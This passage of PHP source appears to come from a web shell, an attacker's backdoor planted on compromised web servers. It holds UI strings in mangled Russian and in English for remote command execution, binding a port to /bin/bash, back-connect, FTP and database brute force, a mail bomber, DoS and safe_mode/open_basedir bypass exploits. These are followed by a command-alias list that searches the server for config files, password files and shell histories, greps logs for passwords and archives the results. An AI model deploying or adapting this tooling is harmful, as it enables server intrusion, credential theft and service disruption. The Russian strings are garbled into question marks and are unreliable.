2228'ru_text67'=>'Chown/Chgrp/Chmod',
2229
2230'ru_text68'=>'???????',
2231
2232'ru_text69'=>'????????1',
2233
2234'ru_text70'=>'????????2',
2235
2236'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",
2237
2238'ru_text72'=>'????? ??? ??????',
2239
2240'ru_text73'=>'?????? ? ?????',
2241
2242'ru_text74'=>'?????? ? ??????',
2243
2244'ru_text75'=>'* ????? ???????????? ?????????? ?????????',
2245
2246'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',
2247
2248'ru_text80'=>'???',
2249
2250'ru_text81'=>'????',
2251
2252'ru_text82'=>'???? ??????',
2253
2254'ru_text83'=>'?????????? SQL ???????',
2255
2256'ru_text84'=>'SQL ??????',
2257
2258'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',
2259
2260'ru_text86'=>'?????????? ????? ? ???????',
2261
2262'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????',
2263
2264'ru_text88'=>'??????:????',
2265
2266'ru_text89'=>'???? ?? ftp ???????',
2267
2268'ru_text90'=>'????? ????????',
2269
2270'ru_text91'=>'???????????? ?',
2271
2272'ru_text92'=>'??? ?????.',
2273
2274'ru_text93'=>'FTP',
2275
2276'ru_text94'=>'FTP-????????',
2277
2278'ru_text95'=>'?????? ?????????????',
2279
2280'ru_text96'=>'?? ??????? ???????? ?????? ?????????????',
2281
2282'ru_text97'=>'????????? ??????????: ',
2283
2284'ru_text98'=>'??????? ???????????: ',
2285
2286'ru_text99'=>'/etc/passwd',
2287
2288'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????',
2289
2290'ru_text101'=>'???????????? (user -> resu)',
2291
2292'ru_text102'=>'?????',
2293
2294'ru_text103'=>'???????? ??????',
2295
2296'ru_text104'=>'???????? ????? ?? ???????? ????',
2297
2298'ru_text105'=>'????',
2299
2300'ru_text106'=>'??',
2301
2302'ru_text107'=>'????',
2303
2304'ru_text108'=>'????? ??????',
2305
2306'ru_text109'=>'????????',
2307
2308'ru_text110'=>'??????????',
2309
2310'ru_text111'=>'SQL-?????? : ????',
2311
2312'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)',
2313
2314'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list() (PHP <= 5.1.2)',
2315
2316'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body() (PHP <= 5.1.2)',
2317
2318'ru_text115'=>'???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? [compress.zlib://] (PHP <= 4.4.2, 5.1.2)',
2319
2320'ru_text116'=>'?????????? ????',
2321
2322'ru_text117'=>'?',
2323
2324'ru_text118'=>'???? ??????????',
2325
2326'ru_text119'=>'?? ??????? ??????????? ????',
2327
2328'ru_text120'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? ini_restore() (PHP <= 4.4.4, 5.1.6) by NST',
2329
2330'ru_text121'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ?????????????? fopen() (PHP v4.4.0 memory leak) by NST',
2331
2332'ru_text122'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ?????????????? glob() (PHP <= 5.2.x)',
2333
2334'ru_text123'=>'???????? ??????????? ?????? ??????????? open_basedir, ?????? *.bzip ?????? [compress.bzip2://] (PHP <= 5.2.1)',
2335
2336'ru_text124'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ?????? ? error_log(php://) (PHP <= 5.1.4, 4.4.2)',
2337
2338'ru_text125'=>'??????',
2339
2340'ru_text126'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ????? ?????? ? ???????[NULL-byte] (PHP <= 5.2.0)',
2341
2342'ru_text127'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ?????? ? readfile(php://) (PHP <= 5.2.1, 4.4.4)',
2343
2344'ru_text128'=>'???? ?????????/??????? ????? (touch)',
2345
2346'ru_text129'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ????? ? fopen(srpath://) (PHP v5.2.0)',
2347
2348'ru_text130'=>'???????? ??????????? ?????? ??????????? open_basedir, ?????? *.zip ?????? [zip://] (PHP <= 5.2.1)',
2349
2350'ru_text131'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ??????????? ????? ? ?????????????? symlink() (PHP <= 5.2.1)',
2351
2352'ru_text132'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ?????????????? symlink() (PHP <= 5.2.1)',
2353
2354'ru_text133'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ????? ?????? ? ???????(TMPDIR) (PHP <= 5.2.4)',
2355
2356'ru_text134'=>'???????? ??? ??????',
2357
2358'ru_text135'=>'???????',
2359
2360'ru_text136'=>'???????? ?????????? ??????',
2361
2362'ru_text137'=>'????????',
2363
2364'ru_text138'=>'???????',
2365
2366'ru_text139'=>'????-??????',
2367
2368'ru_text140'=>'DoS',
2369
2370'ru_text141'=>'?????????! ???????? ???? ???-???????.',
2371
2372'ru_text142'=>'????????? ???????',
2373
2374'ru_text143'=>'Temp: ',
2375
2376'ru_text144'=>'Test bypass safe_mode with load file in mysqli',
2377
2378'ru_text145'=>'???????? ??????????? ?????? ??????????? open_basedir, ???????? ???????? ?????????? ? ?????????????? realpath() (PHP <= 5.2.4)',
2379
2380'ru_text146'=>'MAX ???-?? ????????',
2381
2382'ru_text147'=>'',
2383
2384'ru_text148'=>'',
2385
2386'ru_text149'=>'',
2387
2388'ru_text150'=>'',
2389
2390'ru_err0'=>'??????! ?? ???? ???????? ? ???? ',
2391
2392'ru_err1'=>'??????! ?? ???? ????????? ???? ',
2393
2394'ru_err2'=>'??????! ?? ??????? ??????? ',
2395
2396'ru_err3'=>'??????! ?? ??????? ???????????? ? ftp ???????',
2397
2398'ru_err4'=>'?????? ??????????? ?? ftp ???????',
2399
2400'ru_err5'=>'??????! ?? ??????? ???????? ?????????? ?? ftp ???????',
2401
2402'ru_err6'=>'??????! ?? ??????? ????????? ??????',
2403
2404'ru_err7'=>'?????? ??????????',
2405
2406/* ---------------- English strings ('eng_' prefix) follow ---------------- */
2407
2408'eng_butt1' =>'Execute',
2409
2410'eng_butt2' =>'Upload',
2411
2412'eng_butt3' =>'Bind',
2413
2414'eng_butt4' =>'Connect',
2415
2416'eng_butt5' =>'Run',
2417
2418'eng_butt6' =>'Change',
2419
2420'eng_butt7' =>'Show',
2421
2422'eng_butt8' =>'Test',
2423
2424'eng_butt9' =>'Dump',
2425
2426'eng_butt10'=>'Save',
2427
2428'eng_butt11'=>'Edit file',
2429
2430'eng_butt12'=>'Find',
2431
2432'eng_butt13'=>'Create/Delete',
2433
2434'eng_butt14'=>'Download',
2435
2436'eng_butt15'=>'Send',
2437
2438'eng_text1' =>'Executed command',
2439
2440'eng_text2' =>'Execute command on server',
2441
2442'eng_text3' =>'Run command',
2443
2444'eng_text4' =>'Work directory',
2445
2446'eng_text5' =>'Upload files on server',
2447
2448'eng_text6' =>'Local file',
2449
2450'eng_text7' =>'Aliases',
2451
2452'eng_text8' =>'Select alias',
2453
2454'eng_text9' =>'Bind port to /bin/bash',
2455
2456'eng_text10'=>'Port',
2457
2458'eng_text11'=>'Password for access',
2459
2460'eng_text12'=>'back-connect',
2461
2462'eng_text13'=>'IP',
2463
2464'eng_text14'=>'Port',
2465
2466'eng_text15'=>'Upload files from remote server',
2467
2468'eng_text16'=>'With',
2469
2470'eng_text17'=>'Remote file',
2471
2472'eng_text18'=>'Local file',
2473
2474'eng_text19'=>'Exploits',
2475
2476'eng_text20'=>'Use',
2477
2478'eng_text21'=>' New name',
2479
2480'eng_text22'=>'datapipe',
2481
2482'eng_text23'=>'Local port',
2483
2484'eng_text24'=>'Remote host',
2485
2486'eng_text25'=>'Remote port',
2487
2488'eng_text26'=>'Use',
2489
2490'eng_text28'=>'Work in safe_mode',
2491
2492'eng_text29'=>'ACCESS DENIED',
2493
2494'eng_text30'=>'Cat file',
2495
2496'eng_text31'=>'File not found',
2497
2498'eng_text32'=>'Eval PHP code',
2499
2500'eng_text33'=>'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)',
2501
2502'eng_text34'=>'Test bypass safe_mode with include function',
2503
2504'eng_text35'=>'Test bypass safe_mode with load file in mysql',
2505
2506'eng_text36'=>'Database . Table',
2507
2508'eng_text37'=>'Login',
2509
2510'eng_text38'=>'Password',
2511
2512'eng_text39'=>'Database',
2513
2514'eng_text40'=>'Dump database table',
2515
2516'eng_text41'=>'Save dump in file',
2517
2518'eng_text42'=>'Edit files',
2519
2520'eng_text43'=>'File for edit',
2521
2522'eng_text44'=>'Can\'t edit file! Only read access!',
2523
2524'eng_text45'=>'File saved',
2525
2526'eng_text46'=>'Show phpinfo()',
2527
2528'eng_text47'=>'Show variables from php.ini',
2529
2530'eng_text48'=>'Delete temp files',
2531
2532'eng_text49'=>'Delete script from server',
2533
2534'eng_text50'=>'View cpu info',
2535
2536'eng_text51'=>'View memory info',
2537
2538'eng_text52'=>'Find text',
2539
2540'eng_text53'=>'In dirs',
2541
2542'eng_text54'=>'Find text in files',
2543
2544'eng_text55'=>'Only in files',
2545
2546'eng_text56'=>'Nothing :(',
2547
2548'eng_text57'=>'Create/Delete File/Dir',
2549
2550'eng_text58'=>'name',
2551
2552'eng_text59'=>'file',
2553
2554'eng_text60'=>'dir',
2555
2556'eng_text61'=>'File created',
2557
2558'eng_text62'=>'Dir created',
2559
2560'eng_text63'=>'File deleted',
2561
2562'eng_text64'=>'Dir deleted',
2563
2564'eng_text65'=>'Create',
2565
2566'eng_text66'=>'Delete',
2567
2568'eng_text67'=>'Chown/Chgrp/Chmod',
2569
2570'eng_text68'=>'Command',
2571
2572'eng_text69'=>'param1',
2573
2574'eng_text70'=>'param2',
2575
2576'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
2577
2578'eng_text72'=>'Text for find',
2579
2580'eng_text73'=>'Find in folder',
2581
2582'eng_text74'=>'Find in files',
2583
2584'eng_text75'=>'* you can use regexp',
2585
2586'eng_text76'=>'Search text in files via find',
2587
2588'eng_text80'=>'Type',
2589
2590'eng_text81'=>'Net',
2591
2592'eng_text82'=>'Databases',
2593
2594'eng_text83'=>'Run SQL query',
2595
2596'eng_text84'=>'SQL query',
2597
2598'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
2599
2600'eng_text86'=>'Download files from server',
2601
2602'eng_text87'=>'Download files from remote ftp-server',
2603
2604'eng_text88'=>'server:port',
2605
2606'eng_text89'=>'File on ftp',
2607
2608'eng_text90'=>'Transfer mode',
2609
2610'eng_text91'=>'Archivation',
2611
2612'eng_text92'=>'without arch.',
2613
2614'eng_text93'=>'FTP',
2615
2616'eng_text94'=>'FTP-bruteforce',
2617
2618'eng_text95'=>'Users list',
2619
2620'eng_text96'=>'Can\'t get users list',
2621
2622'eng_text97'=>'checked: ',
2623
2624'eng_text98'=>'success: ',
2625
2626'eng_text99'=>'/etc/passwd',
2627
2628'eng_text100'=>'Send file to remote ftp server',
2629
2630'eng_text101'=>'Use reverse (user -> resu)',
2631
2632'eng_text102'=>'Mail',
2633
2634'eng_text103'=>'Send email',
2635
2636'eng_text104'=>'Send file to email',
2637
2638'eng_text105'=>'To',
2639
2640'eng_text106'=>'From',
2641
2642'eng_text107'=>'Subj',
2643
2644'eng_text108'=>'Mail',
2645
2646'eng_text109'=>'Hide',
2647
2648'eng_text110'=>'Show',
2649
2650'eng_text111'=>'SQL-Server : Port',
2651
2652'eng_text112'=>'Test bypass safe_mode with function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)',
2653
2654'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list() (PHP <= 5.1.2)',
2655
2656'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body() (PHP <= 5.1.2)',
2657
2658'eng_text115'=>'Test bypass safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)',
2659
2660'eng_text116'=>'Copy from',
2661
2662'eng_text117'=>'to',
2663
2664'eng_text118'=>'File copied',
2665
2666'eng_text119'=>'Cant copy file',
2667
2668'eng_text120'=>'Test bypass safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST',
2669
2670'eng_text121'=>'Test bypass open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST',
2671
2672'eng_text122'=>'Test bypass open_basedir, view dir list via glob() (PHP <= 5.2.x)',
2673
2674'eng_text123'=>'Test bypass open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)',
2675
2676'eng_text124'=>'Test bypass open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)',
2677
2678'eng_text125'=>'Data',
2679
2680'eng_text126'=>'Test bypass open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)',
2681
2682'eng_text127'=>'Test bypass open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)',
2683
2684'eng_text128'=>'Modify/Access file (touch)',
2685
2686'eng_text129'=>'Test bypass open_basedir, create file via fopen(srpath://) (PHP v5.2.0)',
2687
2688'eng_text130'=>'Test bypass open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)',
2689
2690'eng_text131'=>'Test bypass open_basedir, view file contest via symlink() (PHP <= 5.2.1)',
2691
2692'eng_text132'=>'Test bypass open_basedir, view dir list via symlink() (PHP <= 5.2.1)',
2693
2694'eng_text133'=>'Test bypass open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)',
2695
2696'eng_text134'=>'Database-bruteforce',
2697
2698'eng_text135'=>'Dictionary',
2699
2700'eng_text136'=>'Creating evil symlink',
2701
2702'eng_text137'=>'Useful',
2703
2704'eng_text138'=>'Dangerous',
2705
2706'eng_text139'=>'Mail Bomber',
2707
2708'eng_text140'=>'DoS',
2709
2710'eng_text141'=>'Danger! Web-daemon crash possible.',
2711
2712'eng_text142'=>'Downloaders',
2713
2714'eng_text143'=>'Temp: ',
2715
2716'eng_text144'=>'Test bypass safe_mode with load file in mysqli',
2717
2718'eng_text145'=>'Test bypass open_basedir, view dir list via realpath() (PHP <= 5.2.4)',
2719
2720'eng_text146'=>'Max Interation',
2721
2722'eng_text147'=>'',
2723
2724'eng_text148'=>'',
2725
2726'eng_text149'=>'',
2727
2728'eng_text150'=>'',
2729
2730'eng_err0'=>'Error! Can\'t write in file ',
2731
2732'eng_err1'=>'Error! Can\'t read file ',
2733
2734'eng_err2'=>'Error! Can\'t create ',
2735
2736'eng_err3'=>'Error! Can\'t connect to ftp',
2737
2738'eng_err4'=>'Error! Can\'t login on ftp server',
2739
2740'eng_err5'=>'Error! Can\'t change dir on ftp',
2741
2742'eng_err6'=>'Error! Can\'t sent mail',
2743
2744'eng_err7'=>'Mail send',
2745
2746);
2747
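2748/*
2749
2750Command aliases (the Russian text of this comment was replaced by "?" in an encoding conversion; presumed meaning, reconstructed from the word lengths:)
2751
2752They save typing the same commands again and again. ( Made thanks to my natural laziness )
2753
2754You can add or change the commands yourself.
2755
2756*/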
2757
2758$aliases=array(
2759
2760'----------------------------------locate'=>'',
2761
2762'locate httpd.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate httpd.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2763
2764'locate vhosts.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate vhosts.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2765
2766'locate proftpd.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate proftpd.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2767
2768'locate psybnc.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate psybnc.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2769
2770'locate my.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate my.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2771
2772'locate admin.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate admin.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2773
2774'locate cfg.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate cfg.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2775
2776'locate conf.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate conf.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2777
2778'locate config.dat files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.dat >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2779
2780'locate config.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2781
2782'locate config.inc files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.inc >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2783
2784'locate config.inc.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.inc.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2785
2786'locate config.default.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate config.default.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2787
2788'locate .conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".conf" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2789
2790'locate .pwd files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".pwd" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2791
2792'locate .sql files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".sql" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2793
2794'locate .htpasswd files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".htpasswd" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2795
2796'locate .bash_history files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".bash_history" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2797
2798'locate .mysql_history files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".mysql_history" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2799
2800'locate backup files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate backup >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2801
2802'locate dump files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate dump >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2803
2804'locate priv files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate priv >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2805
2806'----------------------------------tar'=>'',
2807
2808'tar -czvf all.tgz -T '.$tempdir.'grep.txt'=>'tar -czvf all.tgz -T '.$tempdir.'grep.txt',
2809
2810'----------------------------------1'=>'',
2811
2812'locate auth_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate auth_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2813
2814'locate access_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate access_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2815
2816'locate error_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate error_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2817
2818'locate auth.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate auth.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2819
2820'locate access.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate access.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2821
2822'locate error.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate error.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2823
2824'locate ".log" files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'locate ".log" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2825
2826'----------------------------------2'=>'',
2827
2828'cat /var/log/httpd/auth_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/auth_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt',
2829
2830'cat /var/log/httpd/access_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/access_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt',
2831
2832'cat /var/log/httpd/error_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/error_log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt',
2833
2834'cat /var/log/httpd/auth.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/auth.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt',
2835
2836'cat /var/log/httpd/access.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/access.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt',
2837
2838'cat /var/log/httpd/error.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt'=>'cat /var/log/httpd/error.log | grep pass >> '.$tempdir.'pass.txt;cat '.$tempdir.'pass.txt',
2839
2840'----------------------------------find'=>'',
2841
2842'find suid files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -perm -04000 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2843
2844'find suid files in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -type f -perm -04000 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2845
2846'find sgid files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -perm -02000 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2847
2848'find sgid files in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -type f -perm -02000 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2849
2850'find all writable files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2851
2852'find all writable files in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -type f -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2853
2854'find all writable directories >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type d -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2855
2856'find all writable directories in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -type d -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2857
2858'find all writable directories and files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2859
2860'find all writable directories and files in current dir >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find . -perm -2 -ls >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2861
2862'find all .htpasswd files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name .htpasswd >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2863
2864'find all .bash_history files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name .bash_history >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2865
2866'find all .mysql_history files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name .mysql_history >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2867
2868'find all .fetchmailrc files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name .fetchmailrc >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2869
2870'find httpd.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name httpd.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2871
2872'find vhosts.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name vhosts.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2873
2874'find proftpd.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name proftpd.conf >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2875
2876'find admin.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name admin.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2877
2878'find config* files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "config*" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2879
2880'find cfg.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name cfg.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2881
2882'find conf.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name conf.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2883
2884'find config.dat files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.dat >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2885
2886'find config.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2887
2888'find config.inc files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.inc >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2889
2890'find config.inc.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.inc.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2891
2892'find config.default.php files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name config.default.php >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2893
2894'find *.conf files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*.conf" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2895
2896'find *.pwd files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*.pwd" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2897
2898'find *.sql files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*.sql" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2899
2900'find *backup* files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*backup*" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2901
2902'find *dump* files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find / -type f -name "*dump*" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2903
2904'-----------------------------------'=>'',
2905
2906'find /var/ auth_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name auth_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2907
2908'find /var/ access_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name access_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2909
2910'find /var/ error_log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name error_log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2911
2912'find /var/ auth.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name auth.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2913
2914'find /var/ access.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name access.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2915
